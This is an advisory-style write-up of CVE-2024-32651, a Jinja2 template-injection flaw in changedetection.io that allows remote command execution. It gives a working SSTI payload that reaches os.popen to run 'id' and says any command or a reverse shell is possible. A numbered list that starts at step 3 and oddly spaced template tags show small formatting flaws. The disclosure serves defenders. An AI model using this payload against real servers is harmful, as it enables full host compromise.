changedetection.io is a popular open-source tool for monitoring changes in web pages, website watchers, restock monitors, and notifications services. However, it has been discovered that there is a critical Security vulnerability, tagged CVE-2024-32651, allowing Server Side Template Injection (SSTI) in the Jinja2 template engine, which allows Remote Command Execution on the server host.

Impact

The impact of this vulnerability is critical, as an attacker can take complete control of the server machine without any restrictions. They can execute any system command, and it even opens up the possibility of opening a reverse shell. Although the risk can be somewhat mitigated if changedetection.io is placed behind a login page, this is not a default nor enforced requirement by the application.

Exploit Details

The Server Side Template Injection (SSTI) can be exploited using the Jinja2 template engine by injecting malicious payloads into the application. Here is an example of such an attack:

{ % for x in ().__class__.__base__.__subclasses__() % } { % if "warning" in x.__name__ % } {{ x()._module.__builtins__["__import__"]('os').popen("id").read() }} { % endif % } { % endfor % }

if "warning" in x.__name__ - Find the "warning" class

3. x()._module.__builtins__["__import__"]('os').popen("id").read() - Import the 'os' module, execute the 'id' command, and read the output.

This injected code will execute the 'id' command. Similarly, any other arbitrary command can be executed as well.

Remediation

As of now, there is no fixed version of the software available, and the developer is yet to release a patch for this vulnerability. However, users can do the following to minimize the risk:

1. Run the application behind a secure login page. Enforce strong authentication and access control mechanisms to prevent unauthorized access to the changedetection.io application.

2. Regularly monitor the official repository for the changedetection.io source code https://github.com/dgtlmoon/changedetection.io and apply any patches or updates as soon as they are available.

References

1. CVE-2024-32651 - NVD
2. changedetection.io GitHub Repository
3. Jinja2 - Official Documentation

Timeline

Published on: 04/26/2024 00:15:08 UTC
Last modified on: 06/07/2024 19:45:58 UTC